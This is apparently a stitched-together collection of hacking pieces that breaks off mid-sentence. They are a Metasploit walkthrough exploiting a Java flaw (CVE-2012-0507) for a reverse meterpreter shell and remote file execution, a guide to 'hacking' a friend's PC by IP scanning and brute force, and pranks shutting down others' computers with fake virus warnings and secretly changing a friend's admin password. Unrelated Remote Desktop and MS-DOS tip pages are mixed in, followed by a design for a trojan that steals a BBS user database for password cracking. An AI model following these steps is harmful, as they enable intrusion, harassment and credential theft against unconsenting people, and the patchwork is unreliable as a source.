How To Remote Computer Using Metasploit

Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).

    About MetaSploit:
    Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...

Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a free course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

    Donate to HFC, Feed a Child!
    The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

    You can find further details about the donation here:
    http://www.offensive-security.com/metasploit-unleashed/Donate


Hey, where are you going?! Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.

Requirements:

    VirtualBox
    Target OS(windows,...)
    PenTesting Distro(Backtrack )
    JRE 6(unpatched version)


CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

    Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.

I am going to demonstrate this vulnerability with VirtualBox.  I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

    slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
    Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

    Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"


Part III :
Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:


Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display the which settings are available and/or required for this specific module.



Now type "set SRVPORT 80".
and  "set URIPATH /".



Step 3: Set Payload
Type "show payloads", this will displays the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST.

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10.

Now  Type in the msfconsole as "set LHOST 192.168.56.10".



Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine.
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:


Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.



Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.



For Example, Typing 'sysinfo' will display the system information.


You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.


Security Tips:
Update your JRE to the latest version.


conclusion:
I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..!

How To Remote Computer Using IP address

Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.

You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.

Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

Well, both of the hacking has the same process. Let’s summarize what we must do.

    Confirm the website or a computer you want to hack.
    Find or trace their IP address.
    Make sure that IP address is online
    Scan for open ports
    Check for venerable ports
    access through the port
    Brute-force username and password

Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.

For example,
ping www.google.com

will fetch the IP address of Google.com

a How to hack remote computer using IP Address

This is how we can get the IP address of the victims website.

How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.

One of the widely used method to detect IP address of your friend is by chatting with him.

You might find this article helpful

    How to get the IP address using MSN/Yahoo/Pidgin messenger

Now you got the IP address right? Is it online?

To know the online status just ping the IP address, if it is online it will reply.

If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.

Use Advanced Port Scanner to scan all open and venerable ports.
b How to hack remote computer using IP Address

Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.

Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.

telnet [IP address] [Port]
c How to hack remote computer using IP Address

You’ll be asked to input login information.
d How to hack remote computer using IP Address

If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one.

In this way you’ll able to hack remove computer using only IP address

Related news:

    Changing your IP Adress
    Search the profile/people using their Email Address
    Get the larger image from Gravatar image icon
    How to get the IP address using MSN/Yahoo/Pidgin messenger
    Hacking and crashing website using IP

Remote Desktop in Mac OS

Using Remote Desktop, you can access a computer from a remote location. To connect to a Windows computer from another Windows computer, see In Windows, how do I use Remote Desktop to access my remote computer? To connect to a Windows computer from a remote computer running Mac OS X, see below.

To enable Remote Desktop, you must have administrative rights on the computer you want to use as the host (e.g., the computer to which you will connect from a remote location), which must be running one of the following versions of Windows:

    Windows 7 Professional, Enterprise, or Ultimate
    Windows Vista Business, Enterprise, or Ultimate
    Windows XP Professional

Before making a remote connection, first enable the Remote Desktop feature on your host computer, and then install Remote Desktop Connection client software on your client computer.
Enabling Remote Desktop

To enable the Remote Desktop feature on your host (Windows) computer:

    From the Start menu, select Control Panel (or Settings, and then Control Panel). Double-click System.

    In Windows 7 and Vista, click Remote settings. In the "Remote Desktop" section, select one of the two options to allow connections from other computers.

    In Windows XP, select the Remote tab. Select Allow users to connect remotely to this computer.
    To choose which users will have remote access, in 7 and Vista, click Select Users... , or in XP, click Select Remote Users... . Typically, all administrators of the computer will have access by default. Each user must have a password before you can allow remote access.

    When you are finished, click OK. Your computer will now be able to accept incoming Remote Desktop connections.

Installing Remote Desktop Connection client software

You can download the Remote Desktop Connection (RDC) client for Mac OS X from Microsoft Mactopia.
Opening a connection

    Depending upon your network configuration and system requirements, you may first have to establish a VPN connection to your host computer's network.

    At Indiana University:
        You must first establish a VPN connection if:

            You are off campus, connecting to a computer on campus.
            You are on campus, connecting to your home computer in campus or Greek housing.

        See The basics of VPN at IU.
        Alternatively, from your web browser, you can use the Remote Desktop application in IUanyWare, located in the "Utilities" section.

        See How do I set up and use IUanyWare?

    For more about remote desktop connections on the IU network, see About the block on off-campus remote desktop connections at IU.
    Launch Remote Desktop Connection.

    In the Remote Desktop Connection window, in the "Computer:" field, type the DNS name or IP address of the destination host.

    Click Connect.

    In the window that appears, enter your username, passphrase, and domain.

    Click OK to start your session. When you log out of your Windows session, the RDC application will close.

How to Shutdown Another Computer in LAN Area

1. Go to Notepad.
2. Type in  command.com and save as cmd.bat.  A lot of schools block CMD on computers, and this is how to override that.
3. Open it up and it should go to CMD.
4. Type in 'shutdown -i' and press 'Enter'.
5. You will come to this white box with options....wow, that was a vague description.  You'll know it when you see it.  What you do now is add the name of the computer that you want to shut down, if necessary.
6. You can choose whether to warn users or not that their computer is about to shut down.  Personally, I prefer to warn users and as the comment, I like to put something like "WARNING, SECURITY BREACH IN SYSTEM" or "WARNING, VIRUS DETECTED. HARD DRIVE BEING WIPED".
7.  Press okay and then shut down your computer as quickly as possible to avoid people knowing it was you.
8. Watch people freak out when their computer shuts down unexpectedly.

This is a really fun trick and I have done this to my brother at home while he was playing minecraft.  He was REALLY angry when he found out it was me.

Hack by Changing administrator Password

Okay, today, let's have some fun with Google.  Also, today, I will show you how to hack anyone's computer by changing their administrator password.  It's all completely reversible, so it is a Trick AND a hack today.
Let's begin with having some fun with Google.  How about we start with a very minor trick that you all will probably all know.  If you do not have Google, then skip over to the hack.

1.  Open up Google.
2. Type : google l33t   into google search bar and press I'm Feeling Lucky.
Type : google loco   into google search bar and press I'm Feeling Lucky.
Type : google gothic into google search bar and press I'm Feeling Lucky.
Type : ewmew fudd    into google search bar and press I'm Feeling Lucky.
Type : xx-klingon    into google search bar and press I'm Feeling Lucky.
Type : xx-piglatin   into google search bar and press I'm Feeling Lucky.
Type : google bsd    into google search bar and press I'm Feeling Lucky.
Type : google linux  into google search bar and press I'm Feeling Lucky.
Type : answer to life, the universe, and everything  into google and press search.
Wasn't that fun?  Okay, let's do some graffiti with Google now.
3. Open up Google again.
4. Open up www.netdisaster.com and type in your target website.
5. Have some fun.

Okay, let's do the hack.  Do you have a buddy that you secretly hate? Come on.  We all do.  So, next time you're over at their house, go to their computer while they're in the washroom or cooking or playing a sport.
Just as a tip, if your friends know that you hack as a hobby, don't do this, because they will suspect you're at fault in a second.
Let's get started.

1. Open up notepad and type in command.com
2. Save it as 'cmd.bat'
3. Open it up.  You should come to a black screen.
4. Type in net user.
5. Then find the name of the administrator.
6. Once you have the name, type in 'net user [administrator name]*'
7. Type in the password that you choose.

Yes, your buddy may be pissed off, but it is completely reversible! Do the same process and just type in the password that your buddy chooses.

Various MS DOS

Contents:

- TRUENAME
- FDISK /STATUS
- FDISK /MBR
- SHELL=C:\COMMAND.COM /P /F
- COMMAND /F
- COMMAND /P
- COMMAND /D
- VER /R
- ECHO OFF and ECHO ON
- FORMAT /AUTOTEST
- FORMAT /BACKUP
- FORMAT /SELECT
- FORMAT /SELECT /U
- FORMAT /H
- IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command>
- Using ATTRIB to hide directories
- SWITCHES=/W
- FOR %%V IN (/SOMETHING)
- DIR,
- COPY. A:
- DOS?=HIGH
- INSTALLHIGH
- Using : for batch file comments
- REM in lines with pipes or redirection
- Delimiter character

===========================================================================
 TRUENAME
 --------

Internal DOS 5.0 command.  Canonicalize a filename or path (using DOS interrupt 21h, function 60) prints the actual directory.

     Syntax:

     TRUENAME filename   - Prints the complete path to file.
     TRUENAME directory  - Prints the complete path to directory.

Note:  If the path is in a network, it starts with a \\machine-name.

TRUENAME is analogous to the UNIX "whence" command.  It returns the real fully-qualified path name for a command.

TRUENAME is useful in networks, where a physical drive may be mapped to a logical volume, and the user needs to know the physical location of the file.  It ignores the DOS SUBST and JOIN commands, or network MAPped drives.

TRUENAME is an undocumented MS-DOS feature, but it is documented in JP Software's 4DOS software (COMMAND.COM replacement) as follows:

     Syntax:

     TRUENAME [d:][path]filename

     Purpose:

     Returns a fully qualified filename.

     Comments:

     TRUENAME will see "through" JOIN and SUBST commands, and
     requires MS-DOS 3.0 or above.

     Example:

     The following command uses TRUENAME to get the true pathname
     for a file:

     c:\>subst d: c:\util\test
     c:\>truename d:\test.exe

     c:\util\test\test.exe

TRUENAME : will reveal the full name drive and path of the filename.  If you specify a wildcard (*) in the filename, it will expand the filename to use question marks instead.  If the path includes the ..\ sequence, TRUENAME will examine the directory structure and calculate the path.

Stranger still, the line:

     TRUENAME \CRONK\FLIBBET\..\ART

...produces the response:

     C:\CRONK\ART

...even if the directories \CRONK\FLIBBET and the file ART don't exist!  Don't expect this command to work well across networks.  After all, this is still undocumented in MS-DOS for a reason!

===========================================================================
 FDISK /STATUS
 -------------

Prints a screen just like using option 4 of FDISK, "Partition information", but includes extended partition information.  Nice if you want to get an overview without fear of pressing the wrong keys.

Doesn't work in DOS 3.30.

===========================================================================
 FDISK /MBR
 ----------

MS-DOS 5.0 FDISK has an undocumented parameter, /MBR, that causes it to write the master boot record to the hard disk without altering the partition table information.  While this feature is not documented, it can be told to customers on a need-to-know basis.

Warning:  Writing the master boot record to the hard disk in this manner can make certain hard disks partitioned with SpeedStor unusable.  It can also cause problems for some dual-boot programs, or for disks with more than 4 partitions.  Specific information is below.

What is the MBR?

At the end of the ROM BIOS bootstrap routine, the BIOS will read and execute the first physical sector of the first floppy or hard drive on the system. This first sector of the hard disk is called the master boot record, or sometimes the partition table or master boot block. At the beginning of this sector of the hard disk is a small program. At the end of this sector is where the partition information, or partition table, is stored. This program uses the partition information to determine which partition is bootable (usually the first primary DOS partition) and attempts to boot from it.

This program is what is written to the disk by FDISK /MBR and is usually called the master boot record.  During normal operation, FDISK only writes this program to the disk if there is no master boot record.

Why is the MBR changed during Setup?

During installation of Microsoft MS-DOS 5 Upgrade, Setup will replace the master boot record on the hard disk with code to display the message:

        The MS-DOS 5.0 Setup was not completed.
        Insert the UNINSTALL #1 diskette in drive A.
        Press the ENTER key to continue.

This message should be erased and the master boot code rewritten before Setup is completed. If a problem occurs during Setup and you return to the previous MS-DOS, UNINSTAL should also remove this message. However, should Setup or UNINSTAL fail to remove this message, or should the master boot record become corrupted, a new master boot record can be written to the disk using the following command:

         C:\>fdisk /mbr

     WARNINGS:

     This option should not be used if:

        - the disk was partitioned using Storage Dimensions'
          SpeedStor utility with its /Bootall option
        - more than 4 partitions exist
        - certain dual-boot programs are in use

Storage Dimensions' SpeedStor utility using the /Bootall option redefines the drive's physical parameters (cylinder, head, sector).  /BOOTALL stores information on how the drive has been changed in an area of the master boot record that MS-DOS does not use. FDISK /MBR will erase that information, making the disk unusable.

Some older OEM versions of MS-DOS and some third-party partitioning utilities can create more than 4 partitions.  Additional partition information is commonly stored information on partitions in an area that FDISK /MBR will overwrite.

Some dual-boot programs have a special MBR that asks the user which operating system they want on bootup.  FDISK /MBR erases this program.  Dual-boot systems that boot whichever partition is marked Active are not affected by FDISK /MBR.

If you have a Boot Sector Virus, just boot from a known "clean" floppy disk that's write protected and which has FDISK on it, and run FDISK /MBR.

===========================================================================
 SHELL=C:\COMMAND.COM /P /F
 --------------------------

The /F in the CONFIG.SYS SHELL= statement forces a "Fail" response to all "Abort, Retry, Fail" prompts issued by the DOS critical error handler.

===========================================================================
 COMMAND /F
 ----------

Entered on the command line, COMMAND /F makes all those annoying "Abort, Retry, Ignore, Fail" disk error messages default to "Fail" from then on until rebooting.

===========================================================================
 COMMAND /P
 ----------

For DOS 3.30 (not checked with other versions):  Docs say that this doesn't allow you to exit back to the previous shell, but /P also forces AUTOEXEC.BAT to be run on secondary shells.

===========================================================================
 COMMAND /D
 ----------

When used with a primary shell, or secondary with /P, prevents execution of AUTOEXEC.BAT.

===========================================================================
 VER /R
 ------

Yields extended information about the DOS version:

     MS-DOS Version 5.00
     Revision A
     DOS is in HMA

Doesn't work with DOS 3.30.  VER /R is a documented feature of JP Software's 4DOS.

===========================================================================
 ECHO OFF and ECHO ON
 --------------------

Entering ECHO OFF from the command line erases the prompt and leaves just a cursor on the screen.  ECHO ON from the command line restores the prompt.  This works with all version of DOS.

One of the most frequently asked questions is "How do I ECHO a blank line in a batch file?"  The most common answer is to use ECHO directly followed by a period:  ECHO. like so.  However, just about any "white space" character will work, as well as any "delimiter".  The following alternatives can be used:  ECHO.  ECHO"  ECHO,  ECHO:  ECHO;  ECHO[  ECHO]  etc.  Apparently it's just the way that the command handles the delimiter and has been available from way back!  Microsoft just began mentioning it in the documentation recently, though, and their examples use a period.

===========================================================================
 FORMAT /AUTOTEST
 ----------------

The autotest parameter will allow FORMAT to proceed, checking the existing format of the disk (unless the /U parameter with DOS 5 or 6 is also present), and proceeding with the format.

All this will take place with no delay and no waiting for user input.  It will also end without pausing.  It will not ask for a volume label or whether to format another diskette.

WARNING!  This procedure will also work on hard drives!  Be very cautious if you plan to use this feature!

===========================================================================
 FORMAT /BACKUP
 --------------

This works exactly like /AUTOTEST, but it does ask for a volume label.

===========================================================================
 FORMAT /SELECT
 --------------

This is like the DOS MIRROR command... For safety-fanatics only.

===========================================================================
 FORMAT /SELECT /U
 -----------------

Just makes a disk unreadable.  Guess it could be handy?

===========================================================================
 FORMAT /H
 ---------

In DOS 3.30 (not tested with other versions), FORMAT /H will cause the format to begin immediately after pressing Y in response to "Format another", rather than displaying "Place disk to be formatted in drive x: and press Enter" on a second and subsequent disks.

In DOS 5.0, FORMAT reports "invalid switch".

===========================================================================
 IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command>
 ----------------------------------------------------------------

This is a handy quirk of DOS.  Installable drivers are seen as files in all directories.  You can use the if exist test to either test for the existence of a directory, with "if exist <dirname>\nul", which fails if the directory does not exist because the nul device is not found; or to test whether any driver is loaded, such as the DOS 5 or 6 EMM386 memory manager.

Caveats:  For testing NUL, you need to know the name of the directory or the driver whose existence you are testing, and this is MS-DOS specific -- it doesn't work on network drives, and may not work under DR-DOS.

Where did you learn the "EMMXXXX0" name from?  Instead of typing MEM /C, type MEM /D for the "debug" listing.

The only trouble is EXISTS returns true for COM3/4 and LPT2/3 even if the hardware does not exist.

===========================================================================
 Using ATTRIB to hide directories
 --------------------------------

The DOS 5.0 and 6.0 ATTRIB command can do the same thing for directories as it can for files:  ATTRIB +H <dirname>  will hide the named directory.

===========================================================================
 SWITCHES=/W
 -----------

Enables you to have the Windows 3.0 WINA20.386 file anywhere on your boot drive.  Without this you have to have it in the root directory.

This should not be used with Windows 3.1, since it appears to waste around 120K of UMBs.

===========================================================================
 FOR %%V IN (/SOMETHING)
 -----------------------

How can a batch file (without 4DOS) determine from which drive it has been started?

      Example:  C:\>a:test.bat

Now my batch should be able to find out that it is located on drive A: (not the path, only the drive!).

In a batch file, the variable %0 contains the name of the batch file as it was typed at the command line.  If you run the batch file as A:TEST.BAT, %0 will be "A:TEST.BAT".  If you have the directory on your path, and simply type TEST, then %0 will be "TEST".  The drive, path, and extension will only appear in %0 if you enter them in the command used to call the batch file (either typed at the command line, or called from another batch file).  So, you must specify the drive as part of the batch filename for this to work.

To extract the drive only from %0, use the undocumented FOR %%V in /SOMETHING command:

     set drive=
     for %%v in (/%0) do call test2 %%v
     echo Calling drive is %drive%

...where TEST2.BAT is:

     if not '%drive%'=='' set drive=%1:

FOR %%V IN (/SOMETHING) DO WHATEVER will do WHATEVER twice -- the first time with %%V set to the first character in SOMETHING ("S"), the second time with all the remaining characters in SOMETHING ("OMETHING").  If SOMETHING is only a single character, WHATEVER will only be called once, with that character in %%V.  If the single character is a wildcard (? or *) that wild card will not be expanded to a set of filenames.  (The main purpose of this feature is apparently to allow inclusion of the literal characters "?" and "*" without them being expanded.)

This works in DOS 3.30 and later.

===========================================================================
 DIR,
 ----

Using a comma immediately after DIR shows ALL files, including the HIDDEN ones.

This appears only to work with DOS 5.0 and 6.0.  With 3.30, it doesn't display either IO.SYS, MSDOS.SYS (both with S, H and R attribs) or a test file with A and H attribs.

With DOS 5.0, it displayed a test file with H and A, but would not display IO.SYS or MSDOS.SYS with S, H and R.  This isn't surprising actually, since S alone (without H) will prevent inclusion of a file in a normal DIR.

Not tested with DOS 4.x.  Not supported by JP Software's 4DOS.

===========================================================================
 COPY. A:
 --------

The use of a period IMMEDIATELY after some DOS statements will work just like *.*

     Examples:  DEL.      (erase all files in current directory)
                COPY. A:  (copy all files in current directory to A:)

There may be more statements with which it works.

This is actually a documented although obscure feature, though the ability to use the period with COPY is not documented.  What is documented is the fact that "." and ".." can be used to represent the current and parent directories respectively, and these will work with many applications which can handle directory names as arguments.  In this case the "." could also be viewed as a replacement for "*.*"

===========================================================================
 DOS?=HIGH
 ---------

DOS?=HIGH in CONFIG.SYS with DOS 6.0 will prompt you whether to load the DOS kernel high (into the HMA) or not.

===========================================================================
 INSTALLHIGH
 -----------

In DOS 6.0, there is an undocumented CONFIG.SYS command called INSTALLHIGH= which works just like INSTALL= but loads the TSR high (into upper memory).

The only drawback to this is that MemMaker will not touch INSTALLHIGH lines during the optimizing process.  It just takes it as it is currently.  But then again, INSTALL= is ignored too.  All in all, INSTALL and INSTALLHIGH really are commands to set up manually by the user, and are not really recommended for normal use.  Load TSRs at the beginning of AUTOEXEC.BAT (and using LOADHIGH if desired).

       Example:

       DOS=HIGH,UMB
       DEVICE=C:\DOS\HIMEM.SYS
       DEVICE=C:\DOS\EMM386.EXE NOEMS
       INSTALLHIGH=C:\DOS\SHARE.EXE

===========================================================================
 Using : for batch file comments
 -------------------------------

DOS uses a leading : to indicate a label in a batch file.  If the next character following the : is a space or other non-alphanumeric character, then DOS will decide it's an invalid label and skip to the next line, performing no further action.  Faster batch file processing is achieved using this method for comments instead of REM commands.

===========================================================================
 REM in lines with pipes or redirection
 --------------------------------------

For example:  REM echo y | del *.*

Problems are encountered when trying to REM out an "echo y | del *.*" line in a batch file.  The problem appears to only occur if there is a pipe or redirection in the REMed out line, which shows that DOS first reads the entire line and processes pipes and redirections first, and then goes back to find out what to do with them in the line.  It's actually doing what it thinks you've told it:  Piping the output of REM to DEL.  Since REM has no output, DEL hangs, waiting for the answer to its question.

===========================================================================
 Delimiter character
 -------------------

Prior to DOS 5.0, there was an undocumented DOS function that would allow you to set the DOS option delimiter character to something else, like a dash (-).  Once you did this, you could use either \ or / in PATH specifications.

DOS 5.0 removed the function to set the option delimiter, but retained the function to query what it currently is.

(Unfortunately, no further details were provided in this file, so not sure if the delimiter character can still be changed somehow.)

  

(The REAL way to hack RemoteAccess)

             Well dewdz, ya seen the file text about hacking RemoteAccess and you wanna
crack that H/P or warez RA board for mega ratios?  Get Real!



RA *CAN* be hacked but only in the same way as any other BBS sox...  no
sysop reading that file was shat themselves .. here's why not:

Basically the technique outlined involved you writing a trojan and
disguising it as some program the sysop is really gagging for in the hope
is he'll run it on his system.  Wot it'll really do is copy his USER.BBS
onto the filebase so you can call back later and d/l it... neat idea, and
one that in *theory* will work with most BBS sox (most are EVEN easier coz
they don't encrypt the users file like RA) but their execution of it sucks!

Firstly, their compiled batch file relied on the sysop running RA off their
C: drive from the directory \RA...  Yeah, maybe some lame PD board they
hang out on is like that but most sysops I know run multiple drives and
many have more complex directory structures...       Lame Hacker 0 - Sysop 1

Okay... letz assume they got on some lame fucking board and the users file
*is* C:\RA\USERS.BBS - next step is to copy the file into the filebase and
make it d/lable.  How do they do that? (patronising Dez Lymon voice) <g>.

Their idea was to copy the file into D:\FILES\UPLOAD ..  Yeah sure guyz...
EVERY board uses the D: drive for the filebase and happen to have a file
area in \FILES\UPLOAD - NOT!!!!!!                    Lame Hacker 0 - Sysop 2

Right, so they got better odds than winning the national fucking lottery and
all the above worked (yeah man, we're dreamin' but let's give 'em a chance).
What next?  The file has to be d/lable...  you found a sysop that makes
UNCHECKED & UNSCANNED files available for download?  Fuck off!  Get a life!
                                                     Lame Hacker 0 - Sysop 3

So...  okay....  we got a sysop that's so fucking lame he doesn't deserve
to to breath the same air as the rest of the human race and uses all the
above paths and makes unchecked uploads d/lable.  RA by default won't allow
files to be d/led UNLESS they're in the file database.  Unless the USERS.BBS
destination ALREADY EXISTED in that area and was previously in the area
database there's NO WAY you can d/l it.

The way they "solved" this was to add an entry to FILES.BBS in the file
directory.  Nice one... EXCEPT RA DOESN'T USE FILES.BBS AS IT'S FILE
DATABASE.   Unless you happen to be lucky enough that the sysop does an
import from FILES.BBS to the REAL file database before checking out your
planted file (most RA sysops only import from FILES.BBS when adding CDROMs)
the addition of this entry will do FUCK ALL!         Lame Hacker 0 - Sysop 4
                                                     
To quote from the author "This is a generic program and you will have to
tailor it so it will meet your needs." - yeah man, fucking rethink, redesign
and rewrite it more like!

Oh yeah... EVEN IF YOU DO get a copy of the USER.BBS file downloaded THE
PASSWORDS ARE ENCRYPTED!!!                       Lame Hacker :(  -  Sysop:-)


So how can U hack RA?  Well, the idea was okay but, like hacking any system,
you gotta KNOW the system ya gonna hack b4 U stand a chance.

Most sysops will use the DOS environment variable RA set to the RA system
directory so that external doors can find the system files...  that's very
helpful of the sysop, to show us where we can find his config files. <g>

In the RA system directory should be the file CONFIG.RA.  You might want to
include a check for this file within your program and possibly do a disk
and directory scan for the file if RA isn't defined or is set incorrectly.

I'm not *entirely* sure about other versions of RA, but in the current
release (2.02) the CONFIG.RA offset &h3E4 is where the name of the mail
directory starts.  This is the path where USERS.BBS will be found.

Next you need to know for SURE the name of a directory which stores the
files for a filearea from which you are able to download.

I suggest you do this in one of three ways:

1)  Interogate the file FILES.RA in the RA system directory which contains
    the filebase area configs.  You *could* just search the directory for a
    valid path but you'd wouldn't know if you had d/l access to the area. 

2)  If you want to be a bit more clever you could interpret the file and
    find out the minimum security level required to d/l from each area and
    dump your copy of USERS.BBS in the area with the lowest access level,
    pretty much guaranteeing that you'll be able to get to the file.  This
    doesn't take security flags into account so there's still a SLIM
    possiblity you won't be able to d/l the file unless you also write flag
    testing into your program.

3)  My favourite technique is to have the program read a small config file
    which is uploaded with your archive.  This file just contains the name
    of a file you KNOW you have d/l access from.  You can then either do a
    global search for that filename or, preferably (coz it's faster) read
    FILES.RA for the paths used by the filebase and search those.

So now you have the location of the USERS.BBS and the destination directory
you simply need to copy the file.  However, even though the file is sitting
in a filebase directory it STILL isn't available for d/l... why?  Because
it's not in the filearea database.

You could get clever and find amend filearea database files directly if you
get the fileareas path from CONFIG.RA (offset &hC12) and write to the files
HDR\FBD#####.HDR (header) IDX\FDB#####.IDX (index) and, if you want to add
a description, TXT\FBD#####.TXT, where ##### is the RA file area number.

There *is* an easier way.  Shell out to DOS and execute the RAFILE utility
from the RA program path, passing the arguments "ADOPT filename #####".

E.g. the BASIC command would be:

             SHELL "RAFILE ADOPT "+filename$+STR$(areanum)

Where filename$ contains the name of your USERS.BBS copy and areanum is the
RA filearea number.  If your filename was USERTEST.ZIP and you'd copied it
to the directory used for RA file area 10 you'd be executing:

             RAFILE ADOPT USERTEST.ZIP 10

This will "adopt" the file, adding it to the RA file database, making it
available for d/l (assuming you have the appropriate rights to the area).

All you need to do now is to package this trojan file to entice the sysop
into running it...  In the LAME method for hacking RA the author used DSZ
as an example.  That was about the most realistic part of the file and the
only bit worth leaching!  <g>


Your archive:
                DSZ.EXE (your program)
                DSZ.DAT (the *real* DSZ.EXE)
                DSZ.CFG (small file containing the name of a *known*
                         d/lable file - preferabbly encrypted)
                + any other files that normally come with DSZ


               
Flow diagram for DSZ.EXE trojan:

                            _______ 
                           /       \
                          |  Start  |
                           \_______/
                               |
                               |
                      +--------+--------+
                      | Read enviroment |
                      |   variable RA   |
                      +--------+--------+
                               |
                               |
                              / \
                            /     \
                          /CONFIG.RA\          +---------------------+
                        /  exist in   \___>____| Scan drives & paths |
                        \  that path  / No     | search for the file |
                          \    ?    /          +----------+----------+
                            \     /                       |
                              \ /                         |
                           Yes |                          |
                               +------------<-------------+
                               |
                      +--------+--------+
                      | Read CONFIG.RA  |
                      | to get location |
                      |   of USERS.BBS  |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Read DSZ.CFG to |
                      | get a filename  |
                      +--------+--------+
                               |_____________<____________
                               |                          |
                      +--------+--------+                 |
                      | Read FILES.RA to|                 |
                      | get name of the |                 |
                      |  next filearea  |                 |
                      +--------+--------+                 |
                               |                          |
                               |                          |
                              / \                         |
                            /     \                       |
                          /does area\                     |
                        / contain the \________>__________|
                        \     file    / No
                          \    ?    /
                            \     /                      
                              \ /                        
                           Yes |                         
                               |
                      +--------+--------+
                      | Copy USERS.BBS  |
                      | to the filearea |
                      |    directory    |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Run RAFILE with |
                      | ADOPT to update |
                      |   RA database   |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Delete DSZ.EXE  |
                      |   and DSZ.CFG   |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Rename DSZ.DAT  |
                      |   to DSZ.EXE    |
                      +--------+--------+
                               |
                            ___|___ 
                           /       \
                          |  Stop!  |
                           \_______/
                             
Once you've uploaded the file, preferably using a pseudonym, post the sysop
a message telling him how c00l your upload is.  Wait a day or so and dial
back.  Do a filename search using the name you decided to use for your copy
of USERS.BBS and d/l it. 

The next step, now you have the USERS.BBS file is to crack the passwords. 
I only know of ONE crack program out there which has the RA password
encryption algorythm, a program based on the popular Unix CRACKERJACK
program called RA-CRACK.  This simply takes a given word, encrypts it, and
compares it to the USERS.BBS file to find a user with a matching password.

RA-CRACK takes it's source words from a text file so it would be possible
to either:

